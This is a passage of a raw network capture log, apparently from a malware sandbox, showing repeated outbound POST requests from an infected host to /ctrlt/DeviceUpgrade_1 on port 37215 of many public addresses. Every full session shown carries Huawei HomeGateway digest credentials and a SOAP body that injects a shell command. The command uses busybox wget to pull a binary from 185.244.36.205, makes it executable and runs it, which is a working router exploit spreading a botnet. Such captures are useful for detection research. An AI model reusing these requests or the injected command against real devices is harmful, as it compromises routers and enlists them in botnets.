                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              586192.168.2.1550660122.71.115.7337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.222696066 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              587192.168.2.1548812179.205.189.22037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.222735882 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              588192.168.2.153355437.28.183.14637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.222739935 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              589192.168.2.1551088102.187.37.21437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.222743034 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              590192.168.2.1536504138.178.74.10537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.222791910 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              591192.168.2.1553012121.139.189.11537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.222820997 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              592192.168.2.1544388102.197.128.13637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.222821951 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              593192.168.2.1539454157.231.165.5737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.222846985 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              594192.168.2.1535748222.133.139.4337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.222896099 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              595192.168.2.1534314190.239.176.21237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.222899914 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              596192.168.2.1559420186.138.222.20637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.222948074 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
